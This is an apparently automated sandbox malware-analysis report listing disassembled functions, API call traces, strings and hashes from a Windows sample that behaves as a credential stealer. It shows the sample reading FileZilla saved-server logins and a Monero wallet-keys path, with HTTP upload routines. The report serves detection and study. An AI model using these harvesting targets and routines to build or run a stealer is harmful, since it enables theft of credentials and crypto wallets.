                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: X)q
                  • API String ID: 0-2881036112
                  • Opcode ID: 3e61f05c2a7b41bfb05419aaae805989f3e9704a11edf8b513d8f15194ff2edd
                  • Instruction ID: d896d6efddbdd426b71936f34a9b83bbf4bd251855291cdc35a8290c4b5f01e4
                  • Opcode Fuzzy Hash: 3e61f05c2a7b41bfb05419aaae805989f3e9704a11edf8b513d8f15194ff2edd
                  • Instruction Fuzzy Hash: E86158F3E082105BE314597DECC576AB6D9EBA4320F1B463DEE88E3380E9799C0542D2
                  Function 00BDB057 Relevance: .2, Instructions: 217COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 519d7e9de7c277a7bd3e388c8c461a0347e35bd0e6c770b30635abc7e8aa67ba
                  • Instruction ID: 4b6868b581e05798c035991d970908cc09bcb37299fbb231d2b39e62d5af9edd
                  • Opcode Fuzzy Hash: 519d7e9de7c277a7bd3e388c8c461a0347e35bd0e6c770b30635abc7e8aa67ba
                  • Instruction Fuzzy Hash: 6851F7F3E081105BF310A92DEC857AAB7D6DBD4320F2B813DDBD897784E939580586D6
                  Function 00B95926 Relevance: .2, Instructions: 215COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ea2d2c76ef6c924e344fa714a89fd0b4b77603deaae7bf6bbbe9a6332034a461
                  • Instruction ID: 3ee42633e333465260b4fe0d43e3cc23b2d01ed7068f9e73ec93b6314509e5f6
                  • Opcode Fuzzy Hash: ea2d2c76ef6c924e344fa714a89fd0b4b77603deaae7bf6bbbe9a6332034a461
                  • Instruction Fuzzy Hash: A3514CF3A082105FE3185E39ECD477AB6D6E7C4320F2B863DE999D7784D9795C018292
                  Function 00CCB2E3 Relevance: .2, Instructions: 190COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 67d54f5212e06118d1ea6089c86eca7684cba9384deb9fa695e835b4148f03d9
                  • Instruction ID: 7152cca07d07da8edb55c824c2a8b7281e2c1a01a3c48e53a3b2322165925084
                  • Opcode Fuzzy Hash: 67d54f5212e06118d1ea6089c86eca7684cba9384deb9fa695e835b4148f03d9
                  • Instruction Fuzzy Hash: 925125F3A092009FF708AE38DC9673AB7D5EB84320F16463DEAD5C77C4D93958018696
                  Function 00BB41B9 Relevance: .1, Instructions: 133COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ade99226b0a84389e750a6ece98b9c844a3bf4e21cd33a6b9a748960c330a90a
                  • Instruction ID: 126e014348d4cc1d7a07fde716361eaea0c429fce13020978f555463a0f3df48
                  • Opcode Fuzzy Hash: ade99226b0a84389e750a6ece98b9c844a3bf4e21cd33a6b9a748960c330a90a
                  • Instruction Fuzzy Hash: 804122B3E082109BE304593DEC8833BB6DADBD4720F2B463EEA8497384E9749C0586D5
                  Function 00D0A996 Relevance: .1, Instructions: 101COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4a2847dc9c2be19a5224be93458c6afbfc36b15f2622797cc0d4dd959a6fcfcf
                  • Instruction ID: 15b01d9ddc805ff73bd84d945e046b5299d8f983ac0f9fd8af6efa5eaf5976bd
                  • Opcode Fuzzy Hash: 4a2847dc9c2be19a5224be93458c6afbfc36b15f2622797cc0d4dd959a6fcfcf
                  • Instruction Fuzzy Hash: F6316FB290C6109FE315AE19DC85BAAFBE6FFD8760F16882DE7C483610E63554408A97
                  Function 00939750 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  Function 00930250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                    • Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                    • Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                    • Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                    • Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
                    • Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                    • Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00940DBA,00940DB7,00940DB6,00940DB3), ref: 00930362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00930369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00930385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 009303CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 009303DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00930419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00930463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 0093051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 0093054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00930562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00930571
                  • lstrcat.KERNEL32(?,url: ), ref: 00930580
                  • lstrcat.KERNEL32(?,00000000), ref: 00930593
                  • lstrcat.KERNEL32(?,00941678), ref: 009305A2
                  • lstrcat.KERNEL32(?,00000000), ref: 009305B5
                  • lstrcat.KERNEL32(?,0094167C), ref: 009305C4
                  • lstrcat.KERNEL32(?,login: ), ref: 009305D3
                  • lstrcat.KERNEL32(?,00000000), ref: 009305E6
                  • lstrcat.KERNEL32(?,00941688), ref: 009305F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00930604
                  • lstrcat.KERNEL32(?,00000000), ref: 00930617
                  • lstrcat.KERNEL32(?,00941698), ref: 00930626
                  • lstrcat.KERNEL32(?,0094169C), ref: 00930635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 0093068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: cba32c0598786ae3e0689bafd853bc21da7c525c77e8ed526e6815f42e0a3871
                  • Instruction ID: 0af6e46c71fa7b184da71445204e4ec787c4047d635483e9598b707949fb044a
                  • Opcode Fuzzy Hash: cba32c0598786ae3e0689bafd853bc21da7c525c77e8ed526e6815f42e0a3871
                  • Instruction Fuzzy Hash: 6ED12B72D00208ABCB04EBF4DD96EEE7778AF94300F544518F142B7195EE74AA4ADF62
                  Function 00925960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
                    • Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009259F8
                  • StrCmpCA.SHLWAPI(?,0105E790), ref: 00925A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00925B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0105E820,00000000,?,0105C6F0,00000000,?,00941A1C), ref: 00925E71
                  • lstrlen.KERNEL32(00000000), ref: 00925E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00925E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00925E9A
                  • lstrlen.KERNEL32(00000000), ref: 00925EAF
                  • lstrlen.KERNEL32(00000000), ref: 00925ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00925EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00925F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00925F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00925F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00925FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00925FBD
                  • HttpOpenRequestA.WININET(00000000,0105E810,?,0105EAD0,00000000,00000000,00400100,00000000), ref: 00925BF8
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • InternetCloseHandle.WININET(00000000), ref: 00925FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: c970b10435e9d0d1bdda970d0802c00141f4c3099360d70b37c2bb6a077b4a6f
                  • Instruction ID: 892daa2d1f0337a5d6c6895d156370e252757931d2f6f1be4701e414f4164cee
                  • Opcode Fuzzy Hash: c970b10435e9d0d1bdda970d0802c00141f4c3099360d70b37c2bb6a077b4a6f
                  • Instruction Fuzzy Hash: 6A12CD72820118AADB15EBA0DC95FEEB378BF94700F504199F146B3091EF746E49CF66
                  Function 0092CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,0105C720,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,01059110,?,\Monero\wallet.keys,00940E17), ref: 00938B86
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0092D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0092D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D208
                  • lstrcat.KERNEL32(?,00941478), ref: 0092D217
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D22A
                  • lstrcat.KERNEL32(?,0094147C), ref: 0092D239
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D24C
                  • lstrcat.KERNEL32(?,00941480), ref: 0092D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D26E
                  • lstrcat.KERNEL32(?,00941484), ref: 0092D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D290
                  • lstrcat.KERNEL32(?,00941488), ref: 0092D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D2B2
                  • lstrcat.KERNEL32(?,0094148C), ref: 0092D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D2D4
                  • lstrcat.KERNEL32(?,00941490), ref: 0092D2E3
                    • Part of subcall function 0093A820: lstrlen.KERNEL32(00924F05,?,?,00924F05,00940DDE), ref: 0093A82B
                    • Part of subcall function 0093A820: lstrcpy.KERNEL32(00940DDE,00000000), ref: 0093A885
